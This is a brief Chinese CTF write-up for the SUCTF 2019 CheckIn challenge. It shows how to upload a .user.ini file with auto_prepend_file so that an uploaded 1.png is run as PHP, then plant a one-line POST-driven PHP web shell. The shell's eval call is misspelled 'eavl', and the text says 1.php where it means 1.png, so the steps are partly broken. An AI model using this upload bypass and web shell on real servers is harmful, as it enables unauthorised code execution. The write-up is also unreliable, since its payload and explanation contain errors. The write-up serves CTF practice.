[SUCTF 2019]CheckIn

SunRT

2024-07-28

WEB-CTF

.user.ini文件解析上传，php被ban了，phtml，php5，php7等都被ban了，我们先上传.user.ini文件：

上传内容：

1	auto_prepend_file=1.png

意思是将1.php按照php代码去解析：

接下来我们上传1.png，由于上传内容也ban了一部分，我们采用javaweb的写法：

1	<script language='php'> eavl($_POST["SunRT"]);</script>

webshell工具连接的时候，只用输入上传路径即可，或者上传路径/index.php，这是.user.ini上传的特性。